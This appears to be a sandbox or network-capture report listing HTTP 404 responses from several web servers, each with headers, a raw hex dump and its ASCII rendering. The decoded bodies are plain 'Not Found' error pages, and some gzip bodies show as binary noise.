Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveKeep-Alive: timeout=15Date: Sun, 26 Nov 2023 05:59:29 GMTServer: ApacheX-Frame-Options: denyContent-Encoding: gzipData Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 50 2a 10 d4 95 12 84 90 b8 ac bd 63 7b 5a 7b 37 da 5d e7 03 c4 7f 67 bc 4e a4 86 b8 24 97 68 e7 e3 bd dd f7 66 1c 5f 7e 48 df 2f 7f dc df 40 e5 9a fa fa 22 ee ff 20 ae 50 c8 eb 0b 80 b8 41 27 20 af 84 b1 e8 92 a0 75 45 f8 36 f0 09 eb 76 35 82 db ad 30 09 1c 6e 5d 94 5b eb 33 1e 6a 0c 99 96 bb 31 bc 58 09 e3 14 9a 31 50 61 44 83 f0 9b 41 8f 7f 15 52 59 b9 d9 d5 74 fa 72 7e 92 dc 90 74 d5 33 b9 46 98 92 d4 6c 7a da b5 12 52 92 2a 87 52 99 36 12 cd 50 46 b7 ae 26 85 43 a9 42 2b 17 5a fa 85 cf dc 64 8d c6 51 2e ea 50 d4 54 aa 59 26 2c 76 50 a7 17 cb 44 fe 58 1a dd 2a 39 73 46 28 cb ea a0 72 c7 75 7f 8e 44 e8 64 1c 10 4d 33 65 51 eb cd ac 22 29 51 9d 22 c4 91 37 e8 89 87 fc 06 e6 4a 82 bb f4 7b 00 8a bd 48 02 dc ae c8 60 6f db de e9 43 15 29 89 db 31 14 ba 66 96 31 88 ba 3e 34 dd a6 e9 ed 97 9b 77 e9 b2 9f 83 7e 40 ce b7 19 9d 69 b7 a7 ba 0c 43 f8 e8 91 d9 25 f8 ca 23 16 2e 45 09 05 6d d1 82 65 21 39 1c 92 b5 2d 1f b5 82 46 67 c4 b3 26 71 4d 39 47 c2 70 e0 55 7e 50 92 be 24 f4 87 39 90 22 47 ec 4a 87 88 c9 d5 64 3a 87 46 6c a9 69 9b a7 a1 d6 a2 f1 67 91 71 d5 74 7e 78 e7 9a 70 b3 d2 c6 75 cf 8c a3 fd 42 c4 9d 1f 9e 5e d2 1a 48 26 c1 7e c0 7b 31 22 8e fa ac cd 0d ad dc d3 f5 78 10 6b d1 47 fb 2d 91 3a 6f 1b 36 64 b2 31 e4 f0 d5 91 e9 87 05 19 c5 ff c5 81 5a a8 b2 15 25 3b f9 99 d1 17 9e 33 18 0d 42 1d 20 df c0 c8 9a 3c 09 a2 c8 a2 d4 7c f9 47 d6 7a 92 eb 26 2a 4c d3 1d a3 73 fd 1b 1e 0d bd 99 d4 3a 17 8e b4 9a 54 da 3a 60 d8 b3 8d a3 4f e9 5d ba b8 ef 29 bf 2d ce f1 8c a2 ee 3a 93 07 9e 99 e1 52 e6 8c 7f 46 bd 42 ff 94 bc ee 16 82 57 c0 2b e2 fd eb 7d 63 1f bb ef dc 5f 9a 51 15 c5 f7 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 239TMo@WLP@qzCP*c{Z{7]gN$hf_~H/@" PA' uE6v50n][3j1X1PaDARYtr~t3FlzR*R6PF&CB+ZdQ.PTY&,vPDX*9sF(ruDdM3eQ")Q"7J{H`oC)1f1>4w~@iC%#.Eme!9-Fg&qM9GpU~P$9"GJd:Fligqt~xpuB^H&~{1"xkG-:o6d1Z%;3B <|Gz&*Ls:T:`O])-:RFBW+}c_Q0
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Sun, 26 Nov 2023 05:59:29 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Sun, 26 Nov 2023 05:59:29 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:30 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-123-117.ec2.internalX-Request-Id: 0809a905-3e9a-44dc-8e7b-9846c682d50aData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:30 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-123-133.ec2.internalX-Request-Id: bc230627-bd1b-46ec-9823-cdff25e1e0bbData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Sun, 26 Nov 2023 05:55:02 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:30 GMTServer: ApacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 184Content-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e cd 0e 82 30 10 84 ef 7d 8a 95 bb 2c 1a 8e 4d 0f f2 13 49 10 89 29 07 8f 98 d6 94 04 28 b6 45 e3 db 4b e1 e2 71 76 e6 9b 59 ba 4b af 09 bf d7 19 9c f9 a5 84 ba 39 95 45 02 c1 1e b1 c8 78 8e 98 f2 74 73 8e 61 84 98 55 01 23 54 b9 a1 67 54 c9 56 2c c2 75 ae 97 2c 8e 62 a8 b4 83 5c cf a3 a0 b8 1d 09 c5 35 44 1f 5a 7c 3d 77 60 7f 99 45 11 3a 31 ae 24 18 f9 9a a5 75 52 40 73 2b 01 5b 31 74 63 67 9d 69 9d 36 08 9f d6 c2 b8 70 4f cf 81 1e c1 a9 ce 82 95 e6 2d 4d 48 71 f2 3b eb c2 d2 e9 3f 23 3f 1d 55 df e9 d4 00 00 00 Data Ascii: M0},MI)(EKqvYK9ExtsaU#TgTV,u,b\5DZ|=w`E:1$uR@s+[1tcgi6pO-MHq;?#?U
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:30 GMTServer: ApacheLast-Modified: Thu, 24 Oct 2019 19:33:13 GMTETag: "1e8-595ad1aad5040"Accept-Ranges: bytesContent-Length: 488Content-Type: text/htmlData Raw: 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 70 74 2d 62 72 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 50 e1 67 69 6e 61 20 4e e3 6f 20 45 6e 63 6f 6e 74 72 61 64 61 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 62 3e 3c 66 6f 6e 74 20 66 61 63 65 3d 22 41 72 69 61 6c 22 20 73 69 7a 65 3d 22 33 22 3e 45 72 72 6f 20 34 30 34 3c 2f 66 6f 6e 74 3e 3c 2f 62 3e 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 66 6f 6e 74 20 66 61 63 65 3d 22 4d 53 20 53 61 6e 73 20 53 65 72 69 66 22 20 73 69 7a 65 3d 22 32 22 3e 50 e1 67 69 6e 61 20 6e e3 6f 20 65 6e 63 6f 6e 74 72 61 64 61 3c 2f 66 6f 6e 74 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><meta http-equiv="Content-Language" content="pt-br"><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>Pgina No Encontrada</title></head><body><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center"><b><font face="Arial" size="3">Erro 404</font></b></p><p align="center"><font face="MS Sans Serif" size="2">Pgina no encontrada</font></p></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:30 GMTServer: ApacheUpgrade: h2,h2cConnection: UpgradeAccept-Ranges: bytesVary: Accept-EncodingCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Content-Length: 1699Content-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 65 65 65 3b 0a 7d 0a 0a 62 6f 64 79 2c 20 68 31 2c 20 70 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 53 65 67 6f 65 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 22 4c 75 63 69 64 61 20 47 72 61 6e 64 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 37 37 70 78 3b 0a 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 31 37 30 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 31 35 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 7d 0a 0a 2e 72 6f 77 3a 62 65 66 6f 72 65 2c 20 2e 72 6f 77 3a 61 66 74 65 72 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 3b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 20 22 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 36 20 7b 0a 20 20 77 69 64 74 68 3a 20 35 30 25 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 33 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 35 25 3b 0a 7d 0a 0a 68 31 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 38 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 32 30 70 78 20 30 3b 0a 7d 0a 0a 2e 6c 65 61 64 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 31 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 32 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 7d 0a 0a 70 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 30 70 78 3b 0a 7d 0a 0a 61 20 7b 0
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:30 GMTServer: ApacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 191Content-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e 39 0e c2 30 10 45 7b 9f 62 48 4f 26 20 4a cb 05 24 88 48 61 11 32 05 65 90 07 d9 12 b1 83 ed b0 dc 1e 07 1a ca bf cc fb c3 27 e5 7e 25 cf 87 0a 36 72 db c0 e1 b4 6c ea 15 64 53 c4 ba 92 6b c4 52 96 bf 64 9e 17 88 d5 2e 13 8c eb d8 dd 04 d7 d4 aa 24 a2 89 37 12 8b 62 01 3b 17 61 ed 06 ab 38 fe 4c c6 f1 5b e2 17 a7 de e3 dd 4c fc 75 92 62 bc 17 52 13 78 ba 0f 14 22 29 38 1d 1b c0 56 75 c6 9a 10 7d 1b 9d 47 63 15 bd f2 5e f7 f0 6c 03 d8 04 b8 8e 00 70 16 a2 36 01 02 f9 07 f9 9c 63 3f 0e 7e a7 12 7c 7c 91 7d 00 cc 66 b7 ab dd 00 00 00 Data Ascii: M90E{bHO& J$Ha2e'~%6rldSkRd.$7b;a8L[LubRx")8Vu}Gc^lp6c?~||}f
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:30 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-123-165.ec2.internalX-Request-Id: 81a04949-9058-4c59-ab6f-5d3f787a9479Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:30 GMTServer: ApacheVary: accept-language,accept-charset,User-AgentAccept-Ranges: bytesTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Content-Language: enData Raw: 63 38 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 33 0d 0a 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 0d 0a 33 38 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 33 0d 0a 25 35 62 6e 6f 25 32 30 61 64 64 72 65 73 73 25 32 30 67 69 76 65 6e 25 35 64 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 